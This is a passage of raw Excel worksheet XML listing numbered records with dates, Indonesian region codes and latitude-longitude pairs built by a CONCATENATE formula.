        <v>595</v>
      </c>
      <c r="R3774" t="s">
        <v>84</v>
      </c>
      <c r="S3774" t="s">
        <v>32</v>
      </c>
      <c r="T3774" t="s">
        <v>33</v>
      </c>
      <c r="U3774" s="5">
        <v>10671944</v>
      </c>
      <c r="V3774" s="5" t="s">
        <v>17845</v>
      </c>
      <c r="W3774" s="5">
        <v>-613123</v>
      </c>
      <c r="X3774" t="s">
        <v>21580</v>
      </c>
      <c r="Y3774" t="str">
        <f t="shared" si="58"/>
        <v>-6.13123,106.71944</v>
      </c>
    </row>
    <row r="3775" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3775">
        <v>294205</v>
      </c>
      <c r="B3775" s="1">
        <v>44341</v>
      </c>
      <c r="C3775" s="2">
        <v>0.26641203703703703</v>
      </c>
      <c r="D3775" t="s">
        <v>22</v>
      </c>
      <c r="E3775" t="s">
        <v>23</v>
      </c>
      <c r="F3775" t="s">
        <v>12472</v>
      </c>
      <c r="G3775" t="s">
        <v>12473</v>
      </c>
      <c r="H3775" t="s">
        <v>26</v>
      </c>
      <c r="I3775" t="s">
        <v>882</v>
      </c>
      <c r="J3775" t="s">
        <v>2627</v>
      </c>
      <c r="L3775" t="s">
        <v>12474</v>
      </c>
      <c r="M3775">
        <v>3204110003</v>
      </c>
      <c r="N3775">
        <v>3204110</v>
      </c>
      <c r="O3775">
        <v>3204</v>
      </c>
      <c r="P3775">
        <v>32</v>
      </c>
      <c r="Q3775" t="s">
        <v>12475</v>
      </c>
      <c r="R3775" t="s">
        <v>2126</v>
      </c>
      <c r="S3775" t="s">
        <v>1464</v>
      </c>
      <c r="T3775" t="s">
        <v>42</v>
      </c>
      <c r="U3775" s="5">
        <v>10775510</v>
      </c>
      <c r="V3775" s="5" t="s">
        <v>17846</v>
      </c>
      <c r="W3775" s="5">
        <v>-695995</v>
      </c>
      <c r="X3775" t="s">
        <v>21581</v>
      </c>
      <c r="Y3775" t="str">
        <f t="shared" si="58"/>
        <v>-6.95995,107.75510</v>
      </c>
    </row>
    <row r="3776" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3776">
        <v>295948</v>
      </c>
      <c r="B3776" s="1">
        <v>44345</v>
      </c>
      <c r="C3776" s="2">
        <v>0.43560185185185185</v>
      </c>
      <c r="D3776" t="s">
        <v>22</v>
      </c>
      <c r="E3776" t="s">
        <v>23</v>
      </c>
      <c r="F3776" t="s">
        <v>12476</v>
      </c>
      <c r="H3776" t="s">
        <v>26</v>
      </c>
      <c r="I3776" t="s">
        <v>3275</v>
      </c>
      <c r="J3776" t="s">
        <v>2627</v>
      </c>
      <c r="L3776" t="s">
        <v>12477</v>
      </c>
      <c r="M3776">
        <v>3275040005</v>
      </c>
      <c r="N3776">
        <v>3275040</v>
      </c>
      <c r="O3776">
        <v>3275</v>
      </c>
      <c r="P3776">
        <v>32</v>
      </c>
      <c r="Q3776" t="s">
        <v>2956</v>
      </c>
      <c r="R3776" t="s">
        <v>100</v>
      </c>
      <c r="S3776" t="s">
        <v>41</v>
      </c>
      <c r="T3776" t="s">
        <v>42</v>
      </c>
      <c r="U3776" s="5">
        <v>10701881</v>
      </c>
      <c r="V3776" s="5" t="s">
        <v>17847</v>
      </c>
      <c r="W3776" s="5">
        <v>-625449</v>
      </c>
      <c r="X3776" t="s">
        <v>21582</v>
      </c>
      <c r="Y3776" t="str">
        <f t="shared" si="58"/>
        <v>-6.25449,107.01881</v>
      </c>
    </row>
    <row r="3777" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3777">
        <v>295949</v>
      </c>
      <c r="B3777" s="1">
        <v>44345</v>
      </c>
      <c r="C3777" s="2">
        <v>0.63263888888888886</v>
      </c>
      <c r="D3777" t="s">
        <v>2648</v>
      </c>
      <c r="E3777" t="s">
        <v>23</v>
      </c>
      <c r="G3777" t="s">
        <v>12478</v>
      </c>
      <c r="H3777" t="s">
        <v>26</v>
      </c>
      <c r="J3777" t="s">
        <v>505</v>
      </c>
      <c r="L3777" t="s">
        <v>12479</v>
      </c>
      <c r="M3777">
        <v>3171050001</v>
      </c>
      <c r="N3777">
        <v>3171050</v>
      </c>
      <c r="O3777">
        <v>3171</v>
      </c>
      <c r="P3777">
        <v>31</v>
      </c>
      <c r="Q3777" t="s">
        <v>507</v>
      </c>
      <c r="R3777" t="s">
        <v>508</v>
      </c>
      <c r="S3777" t="s">
        <v>108</v>
      </c>
      <c r="T3777" t="s">
        <v>33</v>
      </c>
      <c r="U3777" s="5">
        <v>10677010</v>
      </c>
      <c r="V3777" s="5" t="s">
        <v>17848</v>
      </c>
      <c r="W3777" s="5">
        <v>-626758</v>
      </c>
      <c r="X3777" t="s">
        <v>21583</v>
      </c>
      <c r="Y3777" t="str">
        <f t="shared" si="58"/>
        <v>-6.26758,106.77010</v>
      </c>
    </row>
    <row r="3778" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3778">
        <v>296107</v>
      </c>
      <c r="B3778" s="1">
        <v>44352</v>
      </c>
      <c r="C3778" s="2">
        <v>0.50944444444444448</v>
      </c>
      <c r="D3778" t="s">
        <v>22</v>
      </c>
      <c r="E3778" t="s">
        <v>23</v>
      </c>
      <c r="F3778" t="s">
        <v>12480</v>
      </c>
      <c r="G3778" t="s">
        <v>12481</v>
      </c>
      <c r="H3778" t="s">
        <v>7086</v>
      </c>
      <c r="I3778" t="s">
        <v>7733</v>
      </c>
      <c r="J3778" t="s">
        <v>2627</v>
      </c>
      <c r="L3778" t="s">
        <v>12482</v>
      </c>
      <c r="M3778">
        <v>3202172002</v>
      </c>
      <c r="N3778">
        <v>3202172</v>
      </c>
      <c r="O3778">
        <v>3202</v>
      </c>
      <c r="P3778">
        <v>32</v>
      </c>
      <c r="Q3778" t="s">
        <v>12483</v>
      </c>
      <c r="R3778" t="s">
        <v>12483</v>
      </c>
      <c r="S3778" t="s">
        <v>7762</v>
      </c>
      <c r="T3778" t="s">
        <v>42</v>
      </c>
      <c r="U3778" s="5">
        <v>10700750</v>
      </c>
      <c r="V3778" s="5" t="s">
        <v>17849</v>
      </c>
      <c r="W3778" s="5">
        <v>-694368</v>
      </c>
      <c r="X3778" t="s">
        <v>21584</v>
      </c>
      <c r="Y3778" t="str">
        <f t="shared" si="58"/>
        <v>-6.94368,107.00750</v>
      </c>
    </row>
    <row r="3779" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3779">
        <v>296109</v>
      </c>
      <c r="B3779" s="1">
        <v>44353</v>
      </c>
      <c r="C3779" s="2">
        <v>0.98187500000000005</v>
      </c>
      <c r="D3779" t="s">
        <v>22</v>
      </c>
      <c r="E3779" t="s">
        <v>23</v>
      </c>
      <c r="F3779" s="3" t="s">
        <v>12484</v>
      </c>
      <c r="G3779" t="s">
        <v>12485</v>
      </c>
      <c r="H3779" t="s">
        <v>7086</v>
      </c>
      <c r="I3779" t="s">
        <v>12486</v>
      </c>
      <c r="J3779" t="s">
        <v>2608</v>
      </c>
      <c r="L3779" t="s">
        <v>12487</v>
      </c>
      <c r="M3779">
        <v>3324170020</v>
      </c>
      <c r="N3779">
        <v>3324170</v>
      </c>
      <c r="O3779">
        <v>3324</v>
      </c>
      <c r="P3779">
        <v>33</v>
      </c>
      <c r="Q3779" t="s">
        <v>12488</v>
      </c>
      <c r="R3779" t="s">
        <v>10022</v>
      </c>
      <c r="S3779" t="s">
        <v>7074</v>
      </c>
      <c r="T3779" t="s">
        <v>1134</v>
      </c>
      <c r="U3779" s="5">
        <v>11021193</v>
      </c>
      <c r="V3779" s="5" t="s">
        <v>17850</v>
      </c>
      <c r="W3779" s="5">
        <v>-690315</v>
      </c>
      <c r="X3779" t="s">
        <v>21585</v>
      </c>
      <c r="Y3779" t="str">
        <f t="shared" ref="Y3779:Y3842" si="59">CONCATENATE(X3779,",",V3779)</f>
        <v>-6.90315,110.21193</v>
      </c>
    </row>
    <row r="3780" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3780">
        <v>296108</v>
      </c>
      <c r="B3780" s="1">
        <v>44353</v>
      </c>
      <c r="C3780" s="2">
        <v>0.57370370370370372</v>
      </c>
      <c r="D3780" t="s">
        <v>22</v>
      </c>
      <c r="E3780" t="s">
        <v>23</v>
      </c>
      <c r="F3780" t="s">
        <v>12489</v>
      </c>
      <c r="G3780" t="s">
        <v>12490</v>
      </c>
      <c r="H3780" t="s">
        <v>26</v>
      </c>
      <c r="I3780" t="s">
        <v>3042</v>
      </c>
      <c r="J3780" t="s">
        <v>12491</v>
      </c>
      <c r="L3780" t="s">
        <v>12492</v>
      </c>
      <c r="M3780">
        <v>3172080004</v>
      </c>
      <c r="N3780">
        <v>3172080</v>
      </c>
      <c r="O3780">
        <v>3172</v>
      </c>
      <c r="P3780">
        <v>31</v>
      </c>
      <c r="Q3780" t="s">
        <v>3084</v>
      </c>
      <c r="R3780" t="s">
        <v>141</v>
      </c>
      <c r="S3780" t="s">
        <v>49</v>
      </c>
      <c r="T3780" t="s">
        <v>33</v>
      </c>
      <c r="U3780" s="5">
        <v>10696974</v>
      </c>
      <c r="V3780" s="5" t="s">
        <v>17851</v>
      </c>
      <c r="W3780" s="5">
        <v>-618573</v>
      </c>
      <c r="X3780" t="s">
        <v>21586</v>
      </c>
      <c r="Y3780" t="str">
        <f t="shared" si="59"/>
        <v>-6.18573,106.96974</v>
      </c>
    </row>
    <row r="3781" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3781">
        <v>296110</v>
      </c>
      <c r="B3781" s="1">
        <v>44355</v>
      </c>
      <c r="C3781" s="2">
        <v>3.9583333333333331E-2</v>
      </c>
      <c r="D3781" t="s">
        <v>2648</v>
      </c>
      <c r="E3781" t="s">
        <v>23</v>
      </c>
      <c r="G3781" t="s">
        <v>12493</v>
      </c>
      <c r="H3781" t="s">
        <v>26</v>
      </c>
      <c r="J3781" t="s">
        <v>12494</v>
      </c>
      <c r="L3781" t="s">
        <v>12495</v>
      </c>
      <c r="M3781">
        <v>3171010005</v>
      </c>
      <c r="N3781">
        <v>3171010</v>
      </c>
      <c r="O3781">
        <v>3171</v>
      </c>
      <c r="P3781">
        <v>31</v>
      </c>
      <c r="Q3781" t="s">
        <v>10706</v>
      </c>
      <c r="R3781" t="s">
        <v>264</v>
      </c>
      <c r="S3781" t="s">
        <v>108</v>
      </c>
      <c r="T3781" t="s">
        <v>33</v>
      </c>
      <c r="U3781" s="5">
        <v>10683878</v>
      </c>
      <c r="V3781" s="5" t="s">
        <v>17852</v>
      </c>
      <c r="W3781" s="5">
        <v>-632736</v>
      </c>
      <c r="X3781" t="s">
        <v>21587</v>
      </c>
      <c r="Y3781" t="str">
        <f t="shared" si="59"/>
        <v>-6.32736,106.83878</v>
      </c>
    </row>
    <row r="3782" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3782">
        <v>296154</v>
      </c>
      <c r="B3782" s="1">
        <v>44357</v>
      </c>
      <c r="C3782" s="2">
        <v>0.68835648148148154</v>
      </c>
      <c r="D3782" t="s">
        <v>85</v>
      </c>
      <c r="E3782" t="s">
        <v>23</v>
      </c>
      <c r="F3782" t="s">
        <v>12496</v>
      </c>
      <c r="G3782" t="s">
        <v>12497</v>
      </c>
      <c r="H3782" t="s">
        <v>26</v>
      </c>
      <c r="J3782" t="s">
        <v>3135</v>
      </c>
      <c r="K3782" t="s">
        <v>12498</v>
      </c>
      <c r="L3782" t="s">
        <v>12499</v>
      </c>
      <c r="M3782">
        <v>3674050006</v>
      </c>
      <c r="N3782">
        <v>3674050</v>
      </c>
      <c r="O3782">
        <v>3674</v>
      </c>
      <c r="P3782">
        <v>36</v>
      </c>
      <c r="Q3782" t="s">
        <v>1042</v>
      </c>
      <c r="R3782" t="s">
        <v>1043</v>
      </c>
      <c r="S3782" t="s">
        <v>170</v>
      </c>
      <c r="T3782" t="s">
        <v>171</v>
      </c>
      <c r="U3782" s="5">
        <v>10674097</v>
      </c>
      <c r="V3782" s="5" t="s">
        <v>17853</v>
      </c>
      <c r="W3782" s="5">
        <v>-629366</v>
      </c>
      <c r="X3782" t="s">
        <v>21588</v>
      </c>
      <c r="Y3782" t="str">
        <f t="shared" si="59"/>
        <v>-6.29366,106.74097</v>
      </c>
    </row>
    <row r="3783" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3783">
        <v>296164</v>
      </c>
      <c r="B3783" s="1">
        <v>44362</v>
      </c>
      <c r="C3783" s="2">
        <v>0.64325231481481482</v>
      </c>
      <c r="D3783" t="s">
        <v>22</v>
      </c>
      <c r="E3783" t="s">
        <v>23</v>
      </c>
      <c r="F3783" t="s">
        <v>12500</v>
      </c>
      <c r="G3783" t="s">
        <v>12501</v>
      </c>
      <c r="H3783" t="s">
        <v>26</v>
      </c>
      <c r="I3783" t="s">
        <v>1651</v>
      </c>
      <c r="J3783" t="s">
        <v>2627</v>
      </c>
      <c r="L3783" t="s">
        <v>12502</v>
      </c>
      <c r="M3783">
        <v>3216081001</v>
      </c>
      <c r="N3783">
        <v>3216081</v>
      </c>
      <c r="O3783">
        <v>3216</v>
      </c>
      <c r="P3783">
        <v>32</v>
      </c>
      <c r="Q3783" t="s">
        <v>1726</v>
      </c>
      <c r="R3783" t="s">
        <v>2512</v>
      </c>
      <c r="S3783" t="s">
        <v>41</v>
      </c>
      <c r="T3783" t="s">
        <v>42</v>
      </c>
      <c r="U3783" s="5">
        <v>10701700</v>
      </c>
      <c r="V3783" s="5" t="s">
        <v>17854</v>
      </c>
      <c r="W3783" s="5">
        <v>-626789</v>
      </c>
      <c r="X3783" t="s">
        <v>21589</v>
      </c>
      <c r="Y3783" t="str">
        <f t="shared" si="59"/>
        <v>-6.26789,107.01700</v>
      </c>
    </row>
    <row r="3784" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3784">
        <v>296163</v>
      </c>
      <c r="B3784" s="1">
        <v>44362</v>
      </c>
      <c r="C3784" s="2">
        <v>0.62822916666666673</v>
      </c>
      <c r="D3784" t="s">
        <v>22</v>
      </c>
      <c r="E3784" t="s">
        <v>23</v>
      </c>
      <c r="F3784" t="s">
        <v>12503</v>
      </c>
      <c r="G3784" t="s">
        <v>12504</v>
      </c>
      <c r="H3784" t="s">
        <v>26</v>
      </c>
      <c r="I3784" t="s">
        <v>1953</v>
      </c>
      <c r="J3784" t="s">
        <v>2627</v>
      </c>
      <c r="L3784" t="s">
        <v>12505</v>
      </c>
      <c r="M3784">
        <v>3275041003</v>
      </c>
      <c r="N3784">
        <v>3275041</v>
      </c>
      <c r="O3784">
        <v>3275</v>
      </c>
      <c r="P3784">
        <v>32</v>
      </c>
      <c r="Q3784" t="s">
        <v>432</v>
      </c>
      <c r="R3784" t="s">
        <v>134</v>
      </c>
      <c r="S3784" t="s">
        <v>41</v>
      </c>
      <c r="T3784" t="s">
        <v>42</v>
      </c>
      <c r="U3784" s="5">
        <v>10700050</v>
      </c>
      <c r="V3784" s="5" t="s">
        <v>17855</v>
      </c>
      <c r="W3784" s="5">
        <v>-627204</v>
      </c>
      <c r="X3784" t="s">
        <v>21590</v>
      </c>
      <c r="Y3784" t="str">
        <f t="shared" si="59"/>
        <v>-6.27204,107.00050</v>
      </c>
    </row>
    <row r="3785" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3785">
        <v>296162</v>
      </c>
      <c r="B3785" s="1">
        <v>44362</v>
      </c>
      <c r="C3785" s="2">
        <v>0.29895833333333333</v>
      </c>
      <c r="D3785" t="s">
        <v>22</v>
      </c>
      <c r="E3785" t="s">
        <v>23</v>
      </c>
      <c r="F3785" t="s">
        <v>12506</v>
      </c>
      <c r="G3785" t="s">
        <v>12507</v>
      </c>
      <c r="H3785" t="s">
        <v>26</v>
      </c>
      <c r="I3785" t="s">
        <v>1633</v>
      </c>
      <c r="J3785" t="s">
        <v>6940</v>
      </c>
      <c r="L3785" t="s">
        <v>12508</v>
      </c>
      <c r="M3785">
        <v>1104053015</v>
      </c>
      <c r="N3785">
        <v>1104053</v>
      </c>
      <c r="O3785">
        <v>1104</v>
      </c>
      <c r="P3785">
        <v>11</v>
      </c>
      <c r="Q3785" t="s">
        <v>12509</v>
      </c>
      <c r="R3785" t="s">
        <v>12510</v>
      </c>
      <c r="S3785" t="s">
        <v>12511</v>
      </c>
      <c r="T3785" t="s">
        <v>6945</v>
      </c>
      <c r="U3785" s="5">
        <v>9781969</v>
      </c>
      <c r="V3785" s="5" t="s">
        <v>17856</v>
      </c>
      <c r="W3785" s="5">
        <v>350631</v>
      </c>
      <c r="X3785" t="s">
        <v>21591</v>
      </c>
      <c r="Y3785" t="str">
        <f t="shared" si="59"/>
        <v>3.50631,97.81969</v>
      </c>
    </row>
    <row r="3786" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3786">
        <v>296156</v>
      </c>
      <c r="B3786" s="1">
        <v>44362</v>
      </c>
      <c r="C3786" s="2">
        <v>2.0833333333333333E-3</v>
      </c>
      <c r="D3786" t="s">
        <v>2648</v>
      </c>
      <c r="E3786" t="s">
        <v>23</v>
      </c>
      <c r="G3786" t="s">
        <v>12512</v>
      </c>
      <c r="H3786" t="s">
        <v>26</v>
      </c>
      <c r="J3786" t="s">
        <v>12513</v>
      </c>
      <c r="L3786" t="s">
        <v>12514</v>
      </c>
      <c r="M3786">
        <v>3173010004</v>
      </c>
      <c r="N3786">
        <v>3173010</v>
      </c>
      <c r="O3786">
        <v>3173</v>
      </c>
      <c r="P3786">
        <v>31</v>
      </c>
      <c r="Q3786" t="s">
        <v>11168</v>
      </c>
      <c r="R3786" t="s">
        <v>1481</v>
      </c>
      <c r="S3786" t="s">
        <v>62</v>
      </c>
      <c r="T3786" t="s">
        <v>33</v>
      </c>
      <c r="U3786" s="5">
        <v>10682033</v>
      </c>
      <c r="V3786" s="5" t="s">
        <v>17857</v>
      </c>
      <c r="W3786" s="5">
        <v>-619708</v>
      </c>
      <c r="X3786" t="s">
        <v>21592</v>
      </c>
      <c r="Y3786" t="str">
        <f t="shared" si="59"/>
        <v>-6.19708,106.82033</v>
      </c>
    </row>
    <row r="3787" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3787">
        <v>296169</v>
      </c>
      <c r="B3787" s="1">
        <v>44363</v>
      </c>
      <c r="C3787" s="2">
        <v>0.47759259259259257</v>
      </c>
      <c r="D3787" t="s">
        <v>22</v>
      </c>
      <c r="E3787" t="s">
        <v>23</v>
      </c>
      <c r="F3787" t="s">
        <v>12515</v>
      </c>
      <c r="G3787" t="s">
        <v>12516</v>
      </c>
      <c r="H3787" t="s">
        <v>7086</v>
      </c>
      <c r="I3787" t="s">
        <v>7421</v>
      </c>
      <c r="J3787" t="s">
        <v>8001</v>
      </c>
      <c r="L3787" t="s">
        <v>12517</v>
      </c>
      <c r="M3787">
        <v>8103040004</v>
      </c>
      <c r="N3787">
        <v>8103040</v>
      </c>
      <c r="O3787">
        <v>8103</v>
      </c>
      <c r="P3787">
        <v>81</v>
      </c>
      <c r="Q3787" t="s">
        <v>12518</v>
      </c>
      <c r="R3787" t="s">
        <v>12519</v>
      </c>
      <c r="S3787" t="s">
        <v>12520</v>
      </c>
      <c r="T3787" t="s">
        <v>8006</v>
      </c>
      <c r="U3787" s="5">
        <v>12945387</v>
      </c>
      <c r="V3787" s="5" t="s">
        <v>17858</v>
      </c>
      <c r="W3787" s="5">
        <v>-325750</v>
      </c>
      <c r="X3787" t="s">
        <v>21593</v>
      </c>
      <c r="Y3787" t="str">
        <f t="shared" si="59"/>
        <v>-3.25750,129.45387</v>
      </c>
    </row>
    <row r="3788" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3788">
        <v>296168</v>
      </c>
      <c r="B3788" s="1">
        <v>44363</v>
      </c>
      <c r="C3788" s="2">
        <v>0.4430324074074074</v>
      </c>
      <c r="D3788" t="s">
        <v>22</v>
      </c>
      <c r="E3788" t="s">
        <v>23</v>
      </c>
      <c r="F3788" t="s">
        <v>12521</v>
      </c>
      <c r="G3788" t="s">
        <v>12522</v>
      </c>
      <c r="H3788" t="s">
        <v>7978</v>
      </c>
      <c r="I3788" t="s">
        <v>7983</v>
      </c>
      <c r="J3788" t="s">
        <v>1128</v>
      </c>
      <c r="L3788" t="s">
        <v>12523</v>
      </c>
      <c r="S3788" t="s">
        <v>8370</v>
      </c>
      <c r="T3788" t="s">
        <v>1221</v>
      </c>
      <c r="U3788" s="5">
        <v>11438570</v>
      </c>
      <c r="V3788" s="5" t="s">
        <v>17859</v>
      </c>
      <c r="W3788" s="5">
        <v>-820503</v>
      </c>
      <c r="X3788" t="s">
        <v>21594</v>
      </c>
      <c r="Y3788" t="str">
        <f t="shared" si="59"/>
        <v>-8.20503,114.38570</v>
      </c>
    </row>
    <row r="3789" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3789">
        <v>296167</v>
      </c>
      <c r="B3789" s="1">
        <v>44363</v>
      </c>
      <c r="C3789" s="2">
        <v>0.40434027777777781</v>
      </c>
      <c r="D3789" t="s">
        <v>22</v>
      </c>
      <c r="E3789" t="s">
        <v>23</v>
      </c>
      <c r="F3789" t="s">
        <v>12524</v>
      </c>
      <c r="G3789" t="s">
        <v>12525</v>
      </c>
      <c r="H3789" t="s">
        <v>26</v>
      </c>
      <c r="I3789" t="s">
        <v>3275</v>
      </c>
      <c r="J3789" t="s">
        <v>2806</v>
      </c>
      <c r="L3789" t="s">
        <v>12526</v>
      </c>
      <c r="M3789">
        <v>3171010004</v>
      </c>
      <c r="N3789">
        <v>3171010</v>
      </c>
      <c r="O3789">
        <v>3171</v>
      </c>
      <c r="P3789">
        <v>31</v>
      </c>
      <c r="Q3789" t="s">
        <v>264</v>
      </c>
      <c r="R3789" t="s">
        <v>264</v>
      </c>
      <c r="S3789" t="s">
        <v>108</v>
      </c>
      <c r="T3789" t="s">
        <v>33</v>
      </c>
      <c r="U3789" s="5">
        <v>10681540</v>
      </c>
      <c r="V3789" s="5" t="s">
        <v>17860</v>
      </c>
      <c r="W3789" s="5">
        <v>-633530</v>
      </c>
      <c r="X3789" t="s">
        <v>21595</v>
      </c>
      <c r="Y3789" t="str">
        <f t="shared" si="59"/>
        <v>-6.33530,106.81540</v>
      </c>
    </row>
    <row r="3790" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3790">
        <v>296170</v>
      </c>
      <c r="B3790" s="1">
        <v>44366</v>
      </c>
      <c r="C3790" s="2">
        <v>0.23611111111111113</v>
      </c>
      <c r="D3790" t="s">
        <v>2648</v>
      </c>
      <c r="E3790" t="s">
        <v>23</v>
      </c>
      <c r="G3790" t="s">
        <v>12527</v>
      </c>
      <c r="H3790" t="s">
        <v>26</v>
      </c>
      <c r="J3790" t="s">
        <v>12528</v>
      </c>
      <c r="L3790" t="s">
        <v>2766</v>
      </c>
      <c r="M3790">
        <v>3175040004</v>
      </c>
      <c r="N3790">
        <v>3175040</v>
      </c>
      <c r="O3790">
        <v>3175</v>
      </c>
      <c r="P3790">
        <v>31</v>
      </c>
      <c r="Q3790" t="s">
        <v>10310</v>
      </c>
      <c r="R3790" t="s">
        <v>2063</v>
      </c>
      <c r="S3790" t="s">
        <v>547</v>
      </c>
      <c r="T3790" t="s">
        <v>33</v>
      </c>
      <c r="U3790" s="5">
        <v>10691549</v>
      </c>
      <c r="V3790" s="5" t="s">
        <v>17861</v>
      </c>
      <c r="W3790" s="5">
        <v>-611150</v>
      </c>
      <c r="X3790" t="s">
        <v>21596</v>
      </c>
      <c r="Y3790" t="str">
        <f t="shared" si="59"/>
        <v>-6.11150,106.91549</v>
      </c>
    </row>
    <row r="3791" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3791">
        <v>296196</v>
      </c>
      <c r="B3791" s="1">
        <v>44369</v>
      </c>
      <c r="C3791" s="2">
        <v>0.44282407407407409</v>
      </c>
      <c r="D3791" t="s">
        <v>85</v>
      </c>
      <c r="E3791" t="s">
        <v>23</v>
      </c>
      <c r="F3791" t="s">
        <v>12529</v>
      </c>
      <c r="G3791" t="s">
        <v>12530</v>
      </c>
      <c r="H3791" t="s">
        <v>26</v>
      </c>
      <c r="J3791" t="s">
        <v>6038</v>
      </c>
      <c r="K3791" t="s">
        <v>12531</v>
      </c>
      <c r="L3791" t="s">
        <v>12532</v>
      </c>
      <c r="M3791">
        <v>1275170005</v>
      </c>
      <c r="N3791">
        <v>1275170</v>
      </c>
      <c r="O3791">
        <v>1275</v>
      </c>
      <c r="P3791">
        <v>12</v>
      </c>
      <c r="Q3791" t="s">
        <v>12533</v>
      </c>
      <c r="R3791" t="s">
        <v>12534</v>
      </c>
      <c r="S3791" t="s">
        <v>7704</v>
      </c>
      <c r="T3791" t="s">
        <v>6043</v>
      </c>
      <c r="U3791" s="5">
        <v>9872423</v>
      </c>
      <c r="V3791" s="5" t="s">
        <v>17862</v>
      </c>
      <c r="W3791" s="5">
        <v>359735</v>
      </c>
      <c r="X3791" t="s">
        <v>21597</v>
      </c>
      <c r="Y3791" t="str">
        <f t="shared" si="59"/>
        <v>3.59735,98.72423</v>
      </c>
    </row>
    <row r="3792" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3792">
        <v>296194</v>
      </c>
      <c r="B3792" s="1">
        <v>44369</v>
      </c>
      <c r="C3792" s="2">
        <v>0.29641203703703706</v>
      </c>
      <c r="D3792" t="s">
        <v>85</v>
      </c>
      <c r="E3792" t="s">
        <v>23</v>
      </c>
      <c r="F3792" t="s">
        <v>12535</v>
      </c>
      <c r="G3792" t="s">
        <v>12536</v>
      </c>
      <c r="H3792" t="s">
        <v>26</v>
      </c>
      <c r="J3792" t="s">
        <v>12537</v>
      </c>
      <c r="K3792" t="s">
        <v>12538</v>
      </c>
      <c r="L3792" t="s">
        <v>12539</v>
      </c>
      <c r="M3792">
        <v>3172050003</v>
      </c>
      <c r="N3792">
        <v>3172050</v>
      </c>
      <c r="O3792">
        <v>3172</v>
      </c>
      <c r="P3792">
        <v>31</v>
      </c>
      <c r="Q3792" t="s">
        <v>2896</v>
      </c>
      <c r="R3792" t="s">
        <v>358</v>
      </c>
      <c r="S3792" t="s">
        <v>49</v>
      </c>
      <c r="T3792" t="s">
        <v>33</v>
      </c>
      <c r="U3792" s="5">
        <v>10687054</v>
      </c>
      <c r="V3792" s="5" t="s">
        <v>17863</v>
      </c>
      <c r="W3792" s="5">
        <v>-628006</v>
      </c>
      <c r="X3792" t="s">
        <v>21598</v>
      </c>
      <c r="Y3792" t="str">
        <f t="shared" si="59"/>
        <v>-6.28006,106.87054</v>
      </c>
    </row>
    <row r="3793" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3793">
        <v>296198</v>
      </c>
      <c r="B3793" s="1">
        <v>44371</v>
      </c>
      <c r="C3793" s="2">
        <v>0.65144675925925932</v>
      </c>
      <c r="D3793" t="s">
        <v>22</v>
      </c>
      <c r="E3793" t="s">
        <v>23</v>
      </c>
      <c r="F3793" t="s">
        <v>12540</v>
      </c>
      <c r="G3793" t="s">
        <v>12541</v>
      </c>
      <c r="H3793" t="s">
        <v>26</v>
      </c>
      <c r="I3793" t="s">
        <v>72</v>
      </c>
      <c r="J3793" t="s">
        <v>2622</v>
      </c>
      <c r="L3793" t="s">
        <v>12542</v>
      </c>
      <c r="M3793">
        <v>3505210005</v>
      </c>
      <c r="N3793">
        <v>3505210</v>
      </c>
      <c r="O3793">
        <v>3505</v>
      </c>
      <c r="P3793">
        <v>35</v>
      </c>
      <c r="Q3793" t="s">
        <v>12543</v>
      </c>
      <c r="R3793" t="s">
        <v>12543</v>
      </c>
      <c r="S3793" t="s">
        <v>9602</v>
      </c>
      <c r="T3793" t="s">
        <v>1221</v>
      </c>
      <c r="U3793" s="5">
        <v>11199471</v>
      </c>
      <c r="V3793" s="5" t="s">
        <v>17864</v>
      </c>
      <c r="W3793" s="5">
        <v>-804286</v>
      </c>
      <c r="X3793" t="s">
        <v>21599</v>
      </c>
      <c r="Y3793" t="str">
        <f t="shared" si="59"/>
        <v>-8.04286,111.99471</v>
      </c>
    </row>
    <row r="3794" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3794">
        <v>296199</v>
      </c>
      <c r="B3794" s="1">
        <v>44374</v>
      </c>
      <c r="C3794" s="2">
        <v>0.33402777777777781</v>
      </c>
      <c r="D3794" t="s">
        <v>2648</v>
      </c>
      <c r="E3794" t="s">
        <v>23</v>
      </c>
      <c r="G3794" t="s">
        <v>12544</v>
      </c>
      <c r="H3794" t="s">
        <v>26</v>
      </c>
      <c r="J3794" t="s">
        <v>12545</v>
      </c>
      <c r="L3794" t="s">
        <v>12546</v>
      </c>
      <c r="M3794">
        <v>3171050006</v>
      </c>
      <c r="N3794">
        <v>3171050</v>
      </c>
      <c r="O3794">
        <v>3171</v>
      </c>
      <c r="P3794">
        <v>31</v>
      </c>
      <c r="Q3794" t="s">
        <v>1501</v>
      </c>
      <c r="R3794" t="s">
        <v>508</v>
      </c>
      <c r="S3794" t="s">
        <v>108</v>
      </c>
      <c r="T3794" t="s">
        <v>33</v>
      </c>
      <c r="U3794" s="5">
        <v>10678758</v>
      </c>
      <c r="V3794" s="5" t="s">
        <v>17865</v>
      </c>
      <c r="W3794" s="5">
        <v>-621207</v>
      </c>
      <c r="X3794" t="s">
        <v>21600</v>
      </c>
      <c r="Y3794" t="str">
        <f t="shared" si="59"/>
        <v>-6.21207,106.78758</v>
      </c>
    </row>
    <row r="3795" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3795">
        <v>296205</v>
      </c>
      <c r="B3795" s="1">
        <v>44375</v>
      </c>
      <c r="C3795" s="2">
        <v>0.31458333333333333</v>
      </c>
      <c r="D3795" t="s">
        <v>2648</v>
      </c>
      <c r="E3795" t="s">
        <v>23</v>
      </c>
      <c r="G3795" t="s">
        <v>12547</v>
      </c>
      <c r="H3795" t="s">
        <v>26</v>
      </c>
